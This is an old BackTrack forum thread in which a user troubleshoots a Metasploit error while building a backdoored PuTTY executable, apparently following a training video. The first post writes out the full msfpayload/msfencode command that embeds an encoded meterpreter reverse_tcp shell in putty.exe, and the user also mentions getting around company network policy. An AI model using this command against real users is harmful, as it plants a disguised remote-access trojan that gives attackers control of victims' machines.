Results 1 to 4 of 4

Thread: msfencode shikata_ga_nai failed "No .text section found in the template exe"

  1. #1
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    7

    Default msfencode shikata_ga_nai failed "No .text section found in the template exe"

    I'm getting this error while executing the following command (from a video of security tube):
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.18.132 R | ./msfencode -t exe -x /root/putty.exe -k -o /root/putty_bd.exe -e x86/shikata_ga_nai -c 5[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
    [*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)

    [-] x86/shikata_ga_nai failed: No .text section found in the template exe ./lib/msf/util/exe.rb:85:in `to_win32pe'./msfencode:212./msfencode:179:in `each'./msfencode:179

    What does it mean ? I've seen also the code at line 85 and line 212, but it seems that "text" variable is not set.

    I'm running BT4-final on vmware image.
    Thanks for any kind of suggestion.

  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default Re: msfencode shikata_ga_nai failed "No .text section found in the template exe"

    have you updated metasploit from svn? Mine works fine with the exact same command.

  3. #3
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    7

    Default Re: msfencode shikata_ga_nai failed "No .text section found in the template exe"

    Quote Originally Posted by purehate View Post
    have you updated metasploit from svn? Mine works fine with the exact same command.
    metasploit is not updated and now that I'm trying to do I'm getting this error "could not connect to server" abd this is due to my company's policy.
    I'm using a BT4 on vmware behind a NAT. I'm able to bypass these company's rules (from my PC of course) because as production's team we can use a proxy so I was wondering if it's possible to manually download from https://www.metasploit.com/svn/framework3/trunk and update it manually.

    Do you have any ideas?

  4. #4
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default Re: msfencode shikata_ga_nai failed "No .text section found in the template exe"

    svn can work through a proxy, Id suggest you look into that. Downloading and transferring manually will be a big PIA.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

Similar Threads

  1. Replies: 3
    Last Post: 10-24-2009, 04:55 PM
  2. BT4beta - VMware 6.5 error "read/write failed"
    By eLiT3SnIpEz in forum OLD Newbie Area
    Replies: 13
    Last Post: 06-18-2009, 12:21 AM
  3. Replies: 1
    Last Post: 01-14-2009, 12:32 AM
  4. Replies: 2
    Last Post: 11-30-2008, 01:47 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •